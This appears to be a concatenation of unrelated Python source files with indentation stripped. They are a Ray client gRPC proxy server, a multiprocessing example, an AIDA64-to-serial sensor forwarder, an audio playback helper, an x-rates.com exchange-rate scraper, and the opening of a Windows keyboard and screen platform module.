def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by checking that the first three arguments look like:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
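# Example (illustrative paths only): a cmdline such as
#   ["/usr/bin/python", "-m", "ray.util.client.server", "--port=23001"]
# re-splits to the same tokens, so elements [1:3] equal
# ["-m", "ray.util.client.server"] and the function returns True.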
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but do not start, a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self.node.get_session_dir_path(),
redis_password=self._redis_password)
# Wait for the running process to transition from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVDel")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` field returned in the ConnectionInfoResponse,
because each individual SpecificServer only has **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server_[port].err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: str,
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
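# Architecture note: serve_proxier() exposes a single public gRPC endpoint;
# for each connecting client the ProxyManager spawns a dedicated
# ray_client_server process on a port in
# [MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT), and the three
# servicer proxies above forward driver, data-stream and log-stream traffic
# to that per-client server, keyed by the `client_id` gRPC metadata.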
|
lala.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
import time, random
def do_something(n_order, x, queue):
time.sleep(5)
queue.put((n_order, x))
def main():
data = [1,2,3,4,5]
queue = Queue()
processes = [Process(target=do_something, args=(n,x,queue)) for n,x in enumerate(data)]
for p in processes:
p.start()
for p in processes:
p.join()
unsorted_result = [queue.get() for _ in processes]
result = [i[1] for i in sorted(unsorted_result)]
print(result)
if __name__ == '__main__':
main()
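# Note: queue.get() yields results in completion order, not submission order,
# which is why each worker tags its result with n_order and main() sorts on
# that tag before stripping it. The expected output here is [1, 2, 3, 4, 5].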
|
PythonMemSer.py
|
import mmap
import contextlib
import time
import json
import win32api
import win32con
import serial
import threading
import xmltodict
import socket
import sys
import os
class pySerial:
hander = serial.Serial()
IsSerialOpen = False
def begin(self,portx,bps):
print("open:")
ret = False
try:
self.hander = serial.Serial(portx, bps, timeout=None)
if(self.hander.is_open):
ret = True
except Exception as e:
print("[open]---异常---:", e)
win32api.MessageBox(0, "[open]---异常---:%s" % str(e), "error",win32con.MB_OK)
self.IsSerialOpen = ret
return ret
def end(self):
print("close:")
try:
self.hander.close()
self.IsSerialOpen = False
except Exception as e:
print("[close]---异常---:", e)
pass
def read(self,len):
if(self.IsSerialOpen):
try:
return self.hander.read(len).decode("gbk")
except Exception as e:
print("[read]---异常---:", e)
pass
return ""
def print(self,buf):
if(self.IsSerialOpen):
try:
result = self.hander.write(buf.encode("gbk"))  # write text data
except Exception as e:
print("[print]---异常---:", e)
return -1
return result
return -1
def write(self,buf):
if(self.IsSerialOpen):
try:
result = self.hander.write(bytes.fromhex(buf))  # write raw hex data
except Exception as e:
print("[write]---异常---:", e)
return -1
return result
return -1
def stute(self):
return self.IsSerialOpen
pass
pass
def GetMemory():
try:
with contextlib.closing(mmap.mmap(-1, 1024, tagname='AIDA64_SensorValues', access=mmap.ACCESS_READ)) as m:
s = m.read(40960)
Sdata = s.decode('UTF-8', 'ignore').strip().strip(b'\x00'.decode())
Stu = 1
if(Sdata == ''):
Stu = 0
Sdata = 'NULL'
except Exception as e:
Stu = 0
Sdata = "ERROR : %s"
return Stu,Sdata
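# GetMemory() reads AIDA64's "SensorValues" shared-memory block; the payload
# is a run of XML fragments (one element per sensor), which TaskSerial()
# below wraps in a <root> element so xmltodict can parse it into a dict.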
TheSerial = pySerial()
#task
def TaskSerial():
while True:
Res,Sdata = GetMemory()
if (Res == 1):
temp = f'<root>{Sdata}</root>'
xs = xmltodict.parse(temp)
data = {'Msg':'OK','Result': xs}
else:
data = {'Msg':'Fail','Result': Sdata}
pass
TheSerial.write("a0")
TheSerial.print(json.dumps(data))
TheSerial.print("\n")
time.sleep(2)
pass
pass
def main():
argc = len(sys.argv)
if(argc != 3):
win32api.MessageBox(0, "use :\" python <fileName> <PORTX> <BPS> \"", "error",win32con.MB_OK)
#print("use :\" python <fileName> <PORTX> <BPS> <HTTPPORT>\"")
#print("like pythonw file.pyw COM3 115200 8888")
return
serOpen = TheSerial.begin(sys.argv[1],int(sys.argv[2]))
if(serOpen == False):
win32api.MessageBox(0, "Serial Open Error", "error",win32con.MB_OK)
win32api.MessageBox(0, "use :\" python <fileName> <PORTX> <BPS>\"", "error",win32con.MB_OK)
#print("use :\" python <fileName> <PORTX> <BPS> <HTTPPORT>\"")
#print("like pythonw file.pyw COM3 115200 8888")
return
win32api.MessageBox(0, "Serial Open OK" , "Info",win32con.MB_OK)
try:
threadUPD = threading.Thread(target=TaskSerial)
threadUPD.setDaemon(True)  # daemon thread: when the main thread exits, this thread exits as well, together with any threads it spawned, regardless of whether their work has finished
threadUPD.start()
except:
print("---异常---: 无法启动线程TaskSerial")
pass
if __name__ == '__main__':
main()
while(True):
inS = input()
if(inS == 'exit'):
TheSerial.end()
break
pass
#pid = os.getpid()
#os.popen('taskkill.exe /pid:'+str(pid))
|
sndplay.py
|
import time
import threading
import numpy as np
__all__ = ['play']
# FIXME this really should be a class Player
def _play(snd, starttime, endtime, frames_per_buffer=1024*10):
import pyaudio # here so that we only import dependency when really used
startindex = int(np.round(snd.fs*starttime))
endindex = int(np.round(snd.fs*endtime))
snd.curpos = startindex
snd._playing = True
snd._stop_playing = False
def callback(in_data, frame_count, time_info, status):
startframe = min(snd.curpos, endindex)
endframe = min(startframe + frame_count, endindex)
data = snd.read_frames(startframe=startframe, endframe=endframe).astype(np.float32).tobytes()
snd.curpos = endframe
if snd._stop_playing:
callback_flag = pyaudio.paComplete
else:
callback_flag = pyaudio.paContinue
return (data, callback_flag)
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=snd.nchannels,
rate=int(snd.fs),
output=True,
stream_callback=callback,
frames_per_buffer=frames_per_buffer)
with snd.open():
stream.start_stream()
while stream.is_active():
time.sleep(0.1)
stream.stop_stream()
stream.close()
p.terminate()
snd._playing = False
def play(snd, starttime, endtime):
thread = threading.Thread(target=_play, args=(snd, starttime, endtime))
thread.start()
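# A minimal usage sketch: `snd` is assumed to be a sound object supplied by
# the caller, exposing `fs`, `nchannels`, `read_frames()` and `open()` as used
# above (these names are assumptions about the calling code, not defined here).
#
#   play(snd, starttime=0.0, endtime=2.0)   # plays the first two seconds
#   snd._stop_playing = True                # signals the callback to finish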
|
x-rates.py
|
# -*- coding: utf-8 -*-
'''
x-rates
'''
__author__ = 'Libao Jin'
__date__ = 'Aug 31, 2015'
import urllib.parse
import urllib.request
import re
import csv
import time
import os
import threading
import numpy as np
def format_date(date):
year, month, day = date
date = str(year).zfill(2) + '-' + str(month).zfill(2) + '-' + str(day).zfill(2)
return date
def is_leap_year(year):
if year % 400 == 0:
return True
elif year % 100 != 0 and year % 4 == 0:
return True
else:
return False
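# Worked example of the rule above: 2000 is a leap year (divisible by 400),
# 1900 is not (divisible by 100 but not by 400), and 2016 is (divisible by 4
# but not by 100).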
def days_in_year(date):
year, month, day = date
months = range(1, month)
days = 0
for m in months:
days += days_of_month(year, m)
days += day
return days
def days_in_year_reversed(date):
days = days_of_year(date[0]) - days_in_year(date)
return days
def days_of_year(year):
if is_leap_year(year):
days = 366
else:
days = 365
return days
def days_of_month(year, month):
if month in [1, 3, 5, 7, 8, 10, 12]:
days = 31
elif month in [4, 6, 9, 11]:
days = 30
else:
if is_leap_year(year):
days = 29
else:
days = 28
return days
def make_date_range(s_date, e_date):
s_year, s_month, s_day = s_date
e_year, e_month, e_day = e_date
years = range(s_year, e_year + 1)
days = 0
if len(years) == 1:
days = days_in_year(e_date) - days_in_year(s_date)
elif len(years) > 1:
for y in years:
if y == s_year:
days += days_in_year_reversed(s_date)
elif y == e_year:
days += days_in_year(e_date)
else:
days += days_of_year(y)
dates = []
dates.append(format_date(s_date))
while days > 0:
days_bound = days_of_month(s_year, s_month)
if s_day + 1 <= days_bound:
s_day += 1
elif s_day + 1 > days_bound:
s_day = 1
if s_month + 1 <= 12:
s_month += 1
else:
s_month = 1
s_year += 1
s_date = (s_year, s_month, s_day)
dates.append(format_date(s_date))
days -= 1
return dates
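# Example: make_date_range((2015, 1, 30), (2015, 2, 2)) counts 3 remaining
# days, walks day by day across the month boundary, and returns
#   ['2015-01-30', '2015-01-31', '2015-02-01', '2015-02-02'].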
def get_xrates():
'visit x-rates site and grab the exchange rate'
except_time = 0
url = 'http://www.x-rates.com/table/'
values = {'from': 'CNY', 'amount':'1'}
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
headers = { 'User-Agent' : user_agent}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8') # data should be bytes
req = urllib.request.Request(url, data, headers)
try:
with urllib.request.urlopen(req) as response:
the_page = response.read().decode('utf-8')
return the_page
except urllib.error.URLError:
except_time += 1
if except_time < 2:
print('Error! Try again.')
the_page = get_xrates()
return the_page
else:
print('Error! Pass.')
return None
def get_xrates_by_date(search_date):
'visit x-rates site and grab the exchange rate'
except_time = 0
url = 'http://www.x-rates.com/historical/?date={0}&amount=1&from=CNY'.format(search_date)
req = urllib.request.Request(url)
try:
with urllib.request.urlopen(req) as response:
the_page = response.read().decode('utf-8')
return the_page
except urllib.error.URLError:
except_time += 1
if except_time < 2:
print('Error! Try to access {} again.'.format(search_date))
the_page = get_xrates_by_date(search_date)
return the_page
else:
print('Error! Pass {}.'.format(search_date))
return None
#def get_xrates_by_date2(search_date):
#'visit x-rates site and grab the exchange rate'
#url = 'http://www.x-rates.com/historical/'
#values = {'date': search_date, 'amount': '1','from': 'CNY'}
#user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
#headers = { 'User-Agent' : user_agent}
#data = urllib.parse.urlencode(values)
#data = data.encode("utf-8") # data should be bytes
#req = urllib.request.Request(url, data, headers)
#with urllib.request.urlopen(req) as response:
#the_page = response.read().decode('utf-8')
#return the_page
def save_page(local_file, the_page):
'save the page into local files'
f = open(local_file, 'w+', encoding = 'utf-8')
f.write(the_page)
f.close()
def combine_data(folder):
os.chdir(folder)
files = os.listdir('.')
ext_filter = r'.*\.csv'
p = re.compile(ext_filter)
csv_files = []
for f in files:
m = p.match(f)
if m:
csv_files.append(m.group())
else:
continue
print(csv_files)
header = ['Time']
total_data = r'..\x-rates_all.csv'
td = open(total_data, 'w+', encoding = 'utf-8')
for i, cf in enumerate(csv_files):
data = {}
with open(cf, 'r', encoding = 'utf-8') as f:
csv_reader = csv.DictReader(f)
for row in csv_reader:
if i < 1:
header.append(row['Country'])
data['Time'] = row['Time']
data[row['Country']] = row['To']
if i < 1:
csv_writer = csv.DictWriter(td, fieldnames = header)
csv_writer.writeheader()
csv_writer.writerow(data)
print(i, cf)
td.close()
os.chdir('..')
def parse_data(the_page, current_time, folder):
pattern = r'^\t*<td.*?>(<a.*?>)?(.*?)</.*>'
p = re.compile(pattern, re.M)
m = p.findall(the_page)
data = []
if m is not None:
for i,e in enumerate(m):
#print(i, e[1])
if i < 30:
continue
if i % 3 == 0:
sub_data = {}
sub_data['Time'] = current_time
sub_data['Country'] = e[1]
#sub_data = []
#sub_data.append(e[1])
elif i % 3 == 1:
sub_data['From'] = e[1]
elif i % 3 == 2:
sub_data['To'] = e[1]
data.append(sub_data)
outputfile= folder + r'\x-rates_' + current_time + '.csv'
csvfileout = open(outputfile, 'w+')
headers = ['Country', 'From', 'To', 'Time']
cw = csv.DictWriter(csvfileout, fieldnames = headers)
cw.writeheader()
for d in data:
if d['Country'] == 'US Dollar':
print(current_time, d['Country'], d['To'])
cw.writerow(d)
csvfileout.close()
return data
def do_task(current_time, folder):
the_page = get_xrates()
#local_file = 'x-rates.html'
#save_page(local_file, the_page)
parse_data(the_page, current_time, folder)
def do_task_by_date(s_date = (2005, 1, 1), e_date = (2015, 8, 30)):
folder = 'daily'
dates = make_date_range(s_date, e_date)
for date in dates:
the_page = get_xrates_by_date(date)
parse_data(the_page, date, folder)
#time.sleep(1)
def do_task_repeatedly(period=60):
folder = 'data'
while True:
ct = time.gmtime()
current_time = convert_time(ct)
do_task(current_time, folder)
time.sleep(period)
def convert_time(ct):
s = str(ct.tm_year).zfill(2) + '-' + str(ct.tm_mon).zfill(2) + '-' + str(ct.tm_mday).zfill(2) + '_' + str(ct.tm_hour).zfill(2) + '-' + str(ct.tm_min).zfill(2) + '-' + str(ct.tm_sec).zfill(2)
return s
def clean_folder():
files = os.listdir()
print(files)
pattern = '[-.a-zA-Z0-9]*~'
p = re.compile(pattern)
to_delete = []
print('Files have been removed:')
for f in files:
m = p.match(f)
if m:
trash_file = m.group()
print(trash_file)
to_delete.append(trash_file)
os.remove(trash_file)
else:
continue
def thread1():
#t1 = threading.Thread(target = do_task_by_date, args = ((2005, 1, 1), (2005, 12, 31)))
t1 = threading.Thread(target = check_files, args = ((2015, 1, 1), (2015, 3, 1)))
t2 = threading.Thread(target = check_files, args = ((2015, 3, 1), (2015, 5, 1)))
t3 = threading.Thread(target = check_files, args = ((2015, 5, 1), (2015, 7, 1)))
t4 = threading.Thread(target = check_files, args = ((2015, 7, 1), (2015, 8, 31)))
t1.start()
print('Thread-1 started.')
t2.start()
print('Thread-2 started.')
t3.start()
print('Thread-3 started.')
t4.start()
print('Thread-4 started.')
def check_files(s_date, e_date):
dates = make_date_range(s_date, e_date)
folder = r'.\daily\3kb'
files = os.listdir(folder)
#print(files)
not_exist_dates = []
for d in dates:
n = 'x-rates_' + d + '.csv'
if n not in files:
not_exist_dates.append(d)
#print(d)
print(len(not_exist_dates))
folder = 'daily'
for date in not_exist_dates:
the_page = get_xrates_by_date(date)
parse_data(the_page, date, folder)
time.sleep(1)
if __name__ == '__main__':
clean_folder()
#thread1()
#combine_data(r'.\daily\3kb')
do_task_repeatedly()
|
PlatformManagerWindows.py
|
""" Platform-specific code for Windows is encapsulated in this module. """
import os
import re
import time
import numpy
import ctypes
import threading
import logging
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
from ctypes import wintypes
from PIL import Image, ImageTk, ImageOps
from .SettingsDebug import Debug
# Python 3 compatibility
try:
basestring
except NameError:
basestring = str
try:
unicode
except:
unicode = str
class PlatformManagerWindows(object):
""" Abstracts Windows-specific OS-level features """
def __init__(self):
#self._root = tk.Tk()
#self._root.overrideredirect(1)
#self._root.withdraw()
user32 = ctypes.WinDLL('user32', use_last_error=True)
gdi32 = ctypes.WinDLL('gdi32', use_last_error=True)
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
psapi = ctypes.WinDLL('psapi', use_last_error=True)
self._user32 = user32
self._gdi32 = gdi32
self._kernel32 = kernel32
self._psapi = psapi
# Pay attention to different screen DPI settings
self._user32.SetProcessDPIAware()
# Mapping to `keyboard` names
self._SPECIAL_KEYCODES = {
"BACKSPACE": "backspace",
"TAB": "tab",
"CLEAR": "clear",
"ENTER": "enter",
"SHIFT": "shift",
"CTRL": "ctrl",
"ALT": "alt",
"PAUSE": "pause",
"CAPS_LOCK": "caps lock",
"ESC": "esc",
"SPACE": "spacebar",
"PAGE_UP": "page up",
"PAGE_DOWN": "page down",
"END": "end",
"HOME": "home",
"LEFT": "left arrow",
"UP": "up arrow",
"RIGHT": "right arrow",
"DOWN": "down arrow",
"SELECT": "select",
"PRINT": "print",
"PRINTSCREEN": "print screen",
"INSERT": "ins",
"DELETE": "del",
"WIN": "win",
"CMD": "win",
"META": "win",
"NUM0": "keypad 0",
"NUM1": "keypad 1",
"NUM2": "keypad 2",
"NUM3": "keypad 3",
"NUM4": "keypad 4",
"NUM5": "keypad 5",
"NUM6": "keypad 6",
"NUM7": "keypad 7",
"NUM8": "keypad 8",
"NUM9": "keypad 9",
"NUM9": "keypad 9",
"SEPARATOR": 83,
"ADD": 78,
"MINUS": 74,
"MULTIPLY": 55,
"DIVIDE": 53,
"F1": "f1",
"F2": "f2",
"F3": "f3",
"F4": "f4",
"F5": "f5",
"F6": "f6",
"F7": "f7",
"F8": "f8",
"F9": "f9",
"F10": "f10",
"F11": "f11",
"F12": "f12",
"F13": "f13",
"F14": "f14",
"F15": "f15",
"F16": "f16",
"NUM_LOCK": "num lock",
"SCROLL_LOCK": "scroll lock",
}
self._REGULAR_KEYCODES = {
"0": "0",
"1": "1",
"2": "2",
"3": "3",
"4": "4",
"5": "5",
"6": "6",
"7": "7",
"8": "8",
"9": "9",
"a": "a",
"b": "b",
"c": "c",
"d": "d",
"e": "e",
"f": "f",
"g": "g",
"h": "h",
"i": "i",
"j": "j",
"k": "k",
"l": "l",
"m": "m",
"n": "n",
"o": "o",
"p": "p",
"q": "q",
"r": "r",
"s": "s",
"t": "t",
"u": "u",
"v": "v",
"w": "w",
"x": "x",
"y": "y",
"z": "z",
";": ";",
"=": "=",
",": ",",
"-": "-",
".": ".",
"/": "/",
"`": "`",
"[": "[",
"\\": "\\",
"]": "]",
"'": "'",
" ": " ",
}
self._UPPERCASE_KEYCODES = {
"~": "`",
"+": "=",
")": "0",
"!": "1",
"@": "2",
"#": "3",
"$": "4",
"%": "5",
"^": "6",
"&": "7",
"*": "8",
"(": "9",
"A": "a",
"B": "b",
"C": "c",
"D": "d",
"E": "e",
"F": "f",
"G": "g",
"H": "h",
"I": "i",
"J": "j",
"K": "k",
"L": "l",
"M": "m",
"N": "n",
"O": "o",
"P": "p",
"Q": "q",
"R": "r",
"S": "s",
"T": "t",
"U": "u",
"V": "v",
"W": "w",
"X": "x",
"Y": "y",
"Z": "z",
":": ";",
"<": ",",
"_": "-",
">": ".",
"?": "/",
"|": "\\",
"\"": "'",
"{": "[",
"}": "]",
}
def _check_count(self, result, func, args):
#pylint: disable=unused-argument
""" Private function to return ctypes errors cleanly """
if result == 0:
raise ctypes.WinError(ctypes.get_last_error())
return args
## Screen functions
def getBitmapFromRect(self, x, y, w, h):
""" Capture the specified area of the (virtual) screen. """
min_x, min_y, screen_width, screen_height = self._getVirtualScreenRect()
img = self._getVirtualScreenBitmap()
# Limit the coordinates to the virtual screen
# Then offset so 0,0 is the top left corner of the image
# (Top left of virtual screen could be negative)
x1 = min(max(min_x, x), min_x+screen_width) - min_x
y1 = min(max(min_y, y), min_y+screen_height) - min_y
x2 = min(max(min_x, x+w), min_x+screen_width) - min_x
y2 = min(max(min_y, y+h), min_y+screen_height) - min_y
return numpy.array(img.crop((x1, y1, x2, y2)))
def getScreenBounds(self, screenId):
""" Returns the screen size of the specified monitor (0 being the main monitor). """
screen_details = self.getScreenDetails()
if not isinstance(screenId, int) or screenId < -1 or screenId >= len(screen_details):
raise ValueError("Invalid screen ID")
if screenId == -1:
# -1 represents the entire virtual screen
return self._getVirtualScreenRect()
return screen_details[screenId]["rect"]
def getScreenDetails(self):
""" Return list of attached monitors
For each monitor (as dict), ``monitor["rect"]`` represents the screen as positioned
